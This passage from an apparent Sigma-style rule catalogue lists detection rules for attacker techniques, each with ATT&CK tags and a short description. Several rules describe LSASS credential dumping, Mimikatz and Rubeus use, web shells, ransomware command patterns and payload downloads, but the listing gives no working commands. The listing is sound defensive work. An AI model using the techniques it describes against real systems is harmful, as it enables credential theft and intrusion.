    Detects Kapeka backdoor scheduled task creation based on attributes such as paths, commands line flags, etc.


    Read More
  • Lummac Stealer Activity - Execution Of More.com And Vbc.exe

    calendar Jan 30, 2025 · attack.defense-evasion attack.t1055 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.


    Read More
  • MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request

    calendar Jan 30, 2025 · attack.persistence attack.t1505.003 cve.2023-34362 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362


    Read More
  • OWASSRF Exploitation Attempt Using Public POC - Proxy

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint


    Read More
  • Pikabot Fake DLL Extension Execution Via Rundll32.EXE

    calendar Jan 30, 2025 · attack.defense-evasion attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.


    Read More
  • Potential BlackByte Ransomware Activity

    calendar Jan 30, 2025 · attack.execution attack.defense-evasion attack.impact attack.t1485 attack.t1498 attack.t1059.001 attack.t1140 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects command line patterns used by BlackByte ransomware in different operations


    Read More
  • Potential CSharp Streamer RAT Loading .NET Executable Image

    calendar Jan 30, 2025 · attack.command-and-control attack.t1219 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.


    Read More
  • Potential CVE-2023-27997 Exploitation Indicators

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-27997 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects indicators of potential exploitation of CVE-2023-27997 in Frotigate weblogs. To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as weird values of the "enc" parameter


    Read More
  • Potential Exploitation Attempt Of Undocumented WindowsServer RCE

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)


    Read More
  • Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process

    calendar Jan 30, 2025 · attack.execution cve.2024-3094 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.


    Read More
  • Potential Kapeka Decrypted Backdoor Indicator

    calendar Jan 30, 2025 · attack.defense-evasion detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges. The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.


    Read More
  • Potential OWASSRF Exploitation Attempt - Proxy

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint


    Read More
  • Potential Raspberry Robin CPL Execution Activity

    calendar Jan 30, 2025 · attack.defense-evasion attack.execution attack.t1218.011 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants.


    Read More
  • Potential Raspberry Robin Registry Set Internet Settings ZoneMap

    calendar Jan 30, 2025 · attack.t1112 attack.defense-evasion detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.


    Read More
  • Qakbot Uninstaller Execution

    calendar Jan 30, 2025 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet


    Read More
  • Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor

    calendar Jan 30, 2025 · attack.persistence detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Hunts for known SVR-specific scheduled task names


    Read More
  • Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler

    calendar Jan 30, 2025 · attack.persistence detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Hunts for known SVR-specific scheduled task names


    Read More
  • ScreenConnect - SlashAndGrab Exploitation Indicators

    calendar Jan 30, 2025 · attack.defense-evasion detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress


    Read More
  • ScreenConnect User Database Modification

    calendar Jan 30, 2025 · attack.persistence cve.2024-1709 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.


    Read More
  • ScreenConnect User Database Modification - Security

    calendar Jan 30, 2025 · attack.defense-evasion cve.2024-1709 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    This detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.


    Read More
  • Suspicious Computer Account Name Change CVE-2021-42287

    calendar Jan 30, 2025 · attack.defense-evasion attack.persistence attack.t1036 attack.t1098 cve.2021-42287 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287


    Read More
  • Suspicious Set Value of MSDT in Registry (CVE-2022-30190)

    calendar Jan 30, 2025 · attack.defense-evasion attack.t1221 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.


    Read More
  • Failed Code Integrity Checks

    calendar Jan 30, 2025 · attack.defense-evasion attack.t1027.001  ·
    Share on: twitter facebook linkedin copy

    Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.


    Read More
  • Renamed Powershell Under Powershell Channel

    calendar Jan 30, 2025 · attack.execution attack.t1059.001 attack.t1036.003  ·
    Share on: twitter facebook linkedin copy

    Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.


    Read More
  • Suspicious Binaries and Scripts in Public Folder

    calendar Jan 30, 2025 · attack.execution attack.t1204  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.


    Read More
  • Using explorer.exe to open a file explorer folder via command prompt

    calendar Jan 29, 2025 · attack.Discovery attack.T1135  ·
    Share on: twitter facebook linkedin copy

    Detects the initial execution of cmd.exe which spawns explorer.exe with the appropriate command line arguments for opening the My Computer folder.


    Read More
  • Privileged User Has Been Created

    calendar Jan 22, 2025 · attack.persistence attack.t1136.001 attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects the addition of a new user to a privileged group such as "root" or "sudo"


    Read More
  • HackTool - Dumpert Process Dumper Execution

    calendar Jan 22, 2025 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory


    Read More
  • ManageEngine Endpoint Central Dctask64.EXE Potential Abuse

    calendar Jan 22, 2025 · attack.defense-evasion attack.t1055.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.


    Read More
  • Renamed ZOHO Dctask64 Execution

    calendar Jan 22, 2025 · attack.defense-evasion attack.t1036 attack.t1055.001 attack.t1202 attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.


    Read More
  • Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load

    calendar Jan 19, 2025 · attack.defense-evasion attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Detects the image load of VSS DLL by uncommon executables


    Read More
  • Azure Login Bypassing Conditional Access Policies

    calendar Jan 19, 2025 · attack.defense-evasion attack.t1078  ·
    Share on: twitter facebook linkedin copy

    Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith.


    Read More
  • Shell Execution via Rsync - Linux

    calendar Jan 19, 2025 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.


    Read More
  • Suspicious Invocation of Shell via Rsync

    calendar Jan 19, 2025 · attack.execution attack.t1059 attack.t1203  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.


    Read More
  • Exploit Framework User Agent

    calendar Jan 19, 2025 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs


    Read More
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation

    calendar Jan 15, 2025 · attack.execution cve.2023-36874 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.


    Read More
  • CVE-2024-49113 Exploitation Attempt - LDAP Nightmare

    calendar Jan 8, 2025 · attack.impact attack.t1499 cve.2024-49113 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".


    Read More
  • Active Directory Certificate Services Denied Certificate Enrollment Request

    calendar Jan 6, 2025 · attack.credential-access attack.t1553.004  ·
    Share on: twitter facebook linkedin copy

    Detects denied requests by Active Directory Certificate Services. Example of these requests denial include issues with permissions on the certificate template or invalid signatures.


    Read More
  • AWS Console GetSigninToken Potential Abuse

    calendar Jan 6, 2025 · attack.lateral-movement attack.t1021.007 attack.t1550.001  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.


    Read More
  • Bitbucket Audit Log Configuration Updated

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the bitbucket audit log configuration.


    Read More
  • Bitbucket Full Data Export Triggered

    calendar Jan 6, 2025 · attack.collection attack.t1213.003  ·
    Share on: twitter facebook linkedin copy

    Detects when full data export is attempted.


    Read More
  • Bitbucket Global Permission Changed

    calendar Jan 6, 2025 · attack.persistence attack.privilege-escalation attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects global permissions change activity.


    Read More
  • Bitbucket Global Secret Scanning Rule Deleted

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects Bitbucket global secret scanning rule deletion activity.


    Read More
  • Bitbucket Global SSH Settings Changed

    calendar Jan 6, 2025 · attack.lateral-movement attack.defense-evasion attack.t1562.001 attack.t1021.004  ·
    Share on: twitter facebook linkedin copy

    Detects Bitbucket global SSH access configuration changes.


    Read More
  • Bitbucket Project Secret Scanning Allowlist Added

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects when a secret scanning allowlist rule is added for projects.


    Read More
  • Bitbucket Secret Scanning Exempt Repository Added

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects when a repository is exempted from secret scanning feature.


    Read More
  • Bitbucket Secret Scanning Rule Deleted

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects when secret scanning rule is deleted for the project or repository.


    Read More
  • Bitbucket Unauthorized Access To A Resource

    calendar Jan 6, 2025 · attack.resource-development attack.t1586  ·
    Share on: twitter facebook linkedin copy

    Detects unauthorized access attempts to a resource.


    Read More
  • Bitbucket Unauthorized Full Data Export Triggered

    calendar Jan 6, 2025 · attack.collection attack.resource-development attack.t1213.003 attack.t1586  ·
    Share on: twitter facebook linkedin copy

    Detects when full data export is attempted an unauthorized user.


    Read More
  • Bitbucket User Details Export Attempt Detected

    calendar Jan 6, 2025 · attack.collection attack.reconnaissance attack.discovery attack.t1213 attack.t1082 attack.t1591.004  ·
    Share on: twitter facebook linkedin copy

    Detects user data export activity.


    Read More
  • Bitbucket User Login Failure

    calendar Jan 6, 2025 · attack.defense-evasion attack.credential-access attack.t1078.004 attack.t1110  ·
    Share on: twitter facebook linkedin copy

    Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.


    Read More
  • Bitbucket User Login Failure Via SSH

    calendar Jan 6, 2025 · attack.t1021.004 attack.t1110  ·
    Share on: twitter facebook linkedin copy

    Detects SSH user login access failures. Please note that this rule can be noisy and is recommended to use with correlation based on "author.name" field.


    Read More
  • Console CodePage Lookup Via CHCP

    calendar Jan 6, 2025 · attack.discovery attack.t1614.001  ·
    Share on: twitter facebook linkedin copy

    Detects use of chcp to look up the system locale value as part of host discovery


    Read More
  • Diskshadow Script Mode - Uncommon Script Extension Execution

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. Initial baselining of the allowed extension list is required.


    Read More
  • DNS Query Request To OneLaunch Update Service

    calendar Jan 6, 2025 · attack.collection attack.t1056  ·
    Share on: twitter facebook linkedin copy

    Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain.


    Read More
  • DPRK Threat Actor - C2 Communication DNS Indicators

    calendar Jan 6, 2025 · attack.command-and-control detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries for C2 domains used by DPRK Threat actors.


    Read More
  • Enumerate All Information With Whoami.EXE

    calendar Jan 6, 2025 · attack.discovery attack.t1033 car.2016-03-001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "whoami.exe" with the "/all" flag


    Read More
  • Exploitation Indicator Of CVE-2022-42475

    calendar Jan 6, 2025 · attack.initial-access cve.2022-42475 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation indicators of CVE-2022-42475 a heap-based buffer overflow in sslvpnd.


    Read More
  • File In Suspicious Location Encoded To Base64 Via Certutil.EXE

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations


    Read More
  • Github Push Protection Bypass Detected

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects when a user bypasses the push protection on a secret detected by secret scanning.


    Read More
  • Github Push Protection Disabled

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.


    Read More
  • HackTool - Evil-WinRm Execution - PowerShell Module

    calendar Jan 6, 2025 · attack.lateral-movement  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.


    Read More
  • Insensitive Subfolder Search Via Findstr.EXE

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1218 attack.t1564.004 attack.t1552.001 attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.


    Read More
  • Interesting Service Enumeration Via Sc.EXE

    calendar Jan 6, 2025 · attack.t1003  ·
    Share on: twitter facebook linkedin copy

    Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.


    Read More
  • No Suitable Encryption Key Found For Generating Kerberos Ticket

    calendar Jan 6, 2025 · attack.credential-access attack.t1558.003  ·
    Share on: twitter facebook linkedin copy

    Detects errors when a target server doesn't have suitable keys for generating kerberos tickets. This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.


    Read More
  • Port Forwarding Activity Via SSH.EXE

    calendar Jan 6, 2025 · attack.command-and-control attack.lateral-movement attack.t1572 attack.t1021.001 attack.t1021.004  ·
    Share on: twitter facebook linkedin copy

    Detects port forwarding activity via SSH.exe


    Read More
  • Potential Credential Dumping Activity Via LSASS

    calendar Jan 6, 2025 · attack.credential-access attack.t1003.001 attack.s0002  ·
    Share on: twitter facebook linkedin copy

    Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.


    Read More
  • Potential SentinelOne Shell Context Menu Scan Command Tampering

    calendar Jan 6, 2025 · attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.


    Read More
  • Potentially Suspicious Ping/Copy Command Combination

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1070.004  ·
    Share on: twitter facebook linkedin copy

    Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.


    Read More
  • Qakbot Regsvr32 Calc Pattern

    calendar Jan 6, 2025 · attack.defense-evasion attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot


    Read More
  • Rebuild Performance Counter Values Via Lodctr.EXE

    calendar Jan 6, 2025 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.


    Read More
  • Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate

    calendar Jan 6, 2025 · attack.execution attack.initial-access  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of Anydesk using the compromised certificate This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.


    Read More
  • Remote Access Tool - ScreenConnect Remote Command Execution

    calendar Jan 6, 2025 · attack.execution attack.t1059.003  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a system command via the ScreenConnect RMM service.


    Read More
  • Remote Access Tool - ScreenConnect Server Web Shell Execution

    calendar Jan 6, 2025 · attack.initial-access attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects potential web shell execution from the ScreenConnect server process.


    Read More
  • Remote Access Tool - Simple Help Execution

    calendar Jan 6, 2025 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)


    Read More
  • Remote File Download Via Findstr.EXE

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1218 attack.t1564.004 attack.t1552.001 attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.


    Read More
  • Response File Execution Via Odbcconf.EXE

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1218.008  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.


    Read More
  • Suspicious File Download From IP Via Wget.EXE - Paths

    calendar Jan 6, 2025 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe


    Read More
  • Suspicious File Encoded To Base64 Via Certutil.EXE

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious


    Read More
  • Suspicious Invoke-WebRequest Execution

    calendar Jan 6, 2025 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location


    Read More
  • Unsigned DLL Loaded by Windows Utility

    calendar Jan 6, 2025 · attack.t1218.011 attack.t1218.010 attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.


    Read More
  • Suspicious Non PowerShell WSMAN COM Provider

    calendar Dec 28, 2024 · attack.execution attack.t1059.001 attack.lateral-movement attack.t1021.003  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.


    Read More
  • BITS Transfer Job With Uncommon Or Suspicious Remote TLD

    calendar Dec 27, 2024 · attack.defense-evasion attack.persistence attack.t1197  ·
    Share on: twitter facebook linkedin copy

    Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.


    Read More
  • CodeIntegrity - Unmet Signing Level Requirements By File Under Validation

    calendar Dec 27, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. This event is best correlated with EID 3089 to determine the error of the validation.


    Read More
  • Relevant Anti-Virus Signature Keywords In Application Log

    calendar Dec 27, 2024 · attack.resource-development attack.t1588  ·
    Share on: twitter facebook linkedin copy

    Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.


    Read More
  • Uncommon AppX Package Locations

    calendar Dec 27, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects an appx package added the pipeline of the "to be processed" packages which is located in uncommon locations


    Read More
  • Suspicious Windows Service Tampering

    calendar Dec 27, 2024 · attack.defense-evasion attack.t1489 attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts


    Read More
  • DNS Query To Remote Access Software Domain From Non-Browser App

    calendar Dec 19, 2024 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)


    Read More
  • New AWS Lambda Function URL Configuration Created

    calendar Dec 19, 2024 · attack.initial-access attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls. This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.


    Read More
  • AWS SAML Provider Deletion Activity

    calendar Dec 19, 2024 · attack.t1078.004 attack.privilege-escalation attack.t1531  ·
    Share on: twitter facebook linkedin copy

    Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.


    Read More
  • Register new Logon Process by Rubeus

    calendar Dec 19, 2024 · attack.lateral-movement attack.privilege-escalation attack.credential-access attack.t1558.003  ·
    Share on: twitter facebook linkedin copy

    Detects potential use of Rubeus via registered new trusted logon process


    Read More
  • AWS Key Pair Import Activity

    calendar Dec 19, 2024 · attack.initial-access attack.t1078 attack.persistence attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.


    Read More
  • DNS Query Request By QuickAssist.EXE

    calendar Dec 19, 2024 · attack.initial-access attack.t1071.001 attack.t1210  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries initiated by "QuickAssist.exe" to Microsoft Quick Assist primary endpoint that is used to establish a session.


    Read More
  • QuickAssist Execution

    calendar Dec 19, 2024 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.


    Read More
  • Potential Secure Deletion with SDelete

    calendar Dec 14, 2024 · attack.impact attack.defense-evasion attack.t1070.004 attack.t1027.005 attack.t1485 attack.t1553.002 attack.s0195  ·
    Share on: twitter facebook linkedin copy

    Detects files that have extensions commonly seen while SDelete is used to wipe files.


    Read More
  • COM Object Hijacking Via Modification Of Default System CLSID Default Value

    calendar Dec 14, 2024 · attack.persistence attack.t1546.015  ·
    Share on: twitter facebook linkedin copy

    Detects potential COM object hijacking via modification of default system CLSID.


    Read More
  • Local System Accounts Discovery - Linux

    calendar Dec 14, 2024 · attack.discovery attack.t1087.001  ·
    Share on: twitter facebook linkedin copy

    Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.


    Read More
  • Remote Access Tool Services Have Been Installed - Security

    calendar Dec 7, 2024 · attack.persistence attack.t1543.003 attack.t1569.002  ·
    Share on: twitter facebook linkedin copy

    Detects service installation of different remote access tools software. These software are often abused by threat actors to perform


    Read More
  • Modification or Deletion of an AWS RDS Cluster

    calendar Dec 6, 2024 · attack.exfiltration attack.t1020  ·
    Share on: twitter facebook linkedin copy

    Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information.


    Read More
  • NetNTLM Downgrade Attack - Registry

    calendar Dec 3, 2024 · attack.defense-evasion attack.t1562.001 attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects NetNTLM downgrade attack


    Read More
  • Potential Defense Evasion Via Rename Of Highly Relevant Binaries

    calendar Dec 3, 2024 · attack.defense-evasion attack.t1036.003 car.2013-05-009  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.


    Read More
  • Always Install Elevated Windows Installer

    calendar Dec 1, 2024 · attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege


    Read More
  • CMSTP UAC Bypass via COM Object Access

    calendar Dec 1, 2024 · attack.execution attack.defense-evasion attack.privilege-escalation attack.t1548.002 attack.t1218.003 attack.g0069 car.2019-04-001  ·
    Share on: twitter facebook linkedin copy

    Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)


    Read More
  • Exploiting CVE-2019-1388

    calendar Dec 1, 2024 · attack.privilege-escalation attack.t1068 cve.2019-1388 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM


    Read More
  • Msiexec Quiet Installation

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1218.007  ·
    Share on: twitter facebook linkedin copy

    Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)


    Read More
  • Non-privileged Usage of Reg or Powershell

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry


    Read More
  • Permission Check Via Accesschk.EXE

    calendar Dec 1, 2024 · attack.discovery attack.t1069.001  ·
